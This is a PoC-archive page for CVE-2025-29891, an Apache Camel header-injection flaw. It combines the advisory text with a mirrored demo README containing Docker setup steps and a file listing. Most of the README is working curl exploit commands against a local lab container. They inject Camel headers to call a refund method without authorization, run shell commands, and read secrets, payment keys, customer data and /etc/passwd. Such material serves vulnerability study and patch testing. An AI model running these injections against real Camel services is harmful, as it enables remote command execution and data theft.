Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29891 PoC — Apache Camel: Camel Message Header Injection through request parameters

Source
https://github.com/Crystallen1/CVE-2025-29891-demo
Associated Vulnerability
Title:Apache Camel: Camel Message Header Injection through request parameters (CVE-2025-29891)
Description:Bypass/Injection vulnerability in Apache Camel. This issue affects Apache Camel: from 4.10.0 before 4.10.2, from 4.8.0 before 4.8.5, from 3.10.0 before 3.22.4. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header filter, that allows an attacker to include Camel specific headers that for some Camel components can alter the behaviours such as the camel-bean component, or the camel-exec component. If you have Camel applications that are directly connected to the internet via HTTP, then an attacker could include parameters in the HTTP requests that are sent to the Camel application that get translated into headers.  The headers could be both provided as request parameters for an HTTP methods invocation or as part of the payload of the HTTP methods invocation. All the known Camel HTTP component such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http, and camel-netty-http would be vulnerable out of the box. This CVE is related to the CVE-2025-27636: while they have the same root cause and are fixed with the same fix, CVE-2025-27636 was assumed to only be exploitable if an attacker could add malicious HTTP headers, while we have now determined that it is also exploitable via HTTP parameters. Like in CVE-2025-27636, exploitation is only possible if the Camel route uses particular vulnerable components.
Readme
# Apache Camel CVE Demonstration

This project demonstrates security vulnerabilities in Apache Camel related to header injection attacks.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports:
```shell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit vulnerable endpoint by injecting method names:

```shell
# Successful attack - case-sensitive header
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - query parameter injection
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```shell
# Wrong case - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```

### 2. Command Execution Attack

Exploit exec component to execute arbitrary commands:

**Reconnaissance:**
```shell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```shell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"
```

## Verify Attack Results

Check the attack logs inside the container:

```shell

# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint
File Snapshot

 [4.0K]  /data/pocs/620e41d926ff063f4112bacfe2eba21e32acb783
├── [4.6K]  Dockerfile
├── [4.1K]  pom.xml
├── [3.3K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  camel
        │               ├── [ 881]  CamelCveDemoApplication.java
        │               ├── [4.0K]  config
        │               │   ├── [1.5K]  CamelConfig.java
        │               │   └── [ 903]  CorsConfig.java
        │               ├── [4.0K]  controller
        │               │   └── [ 523]  WebController.java
        │               ├── [4.0K]  routes
        │               │   ├── [5.9K]  BeanRoute.java
        │               │   └── [6.5K]  ExecRoute.java
        │               └── [4.0K]  service
        │                   └── [6.1K]  DemoService.java
        └── [4.0K]  resources
            ├── [ 530]  application.properties
            ├── [1.3K]  logback-spring.xml
            └── [4.0K]  static
                └── [ 11K]  index.html

13 directories, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →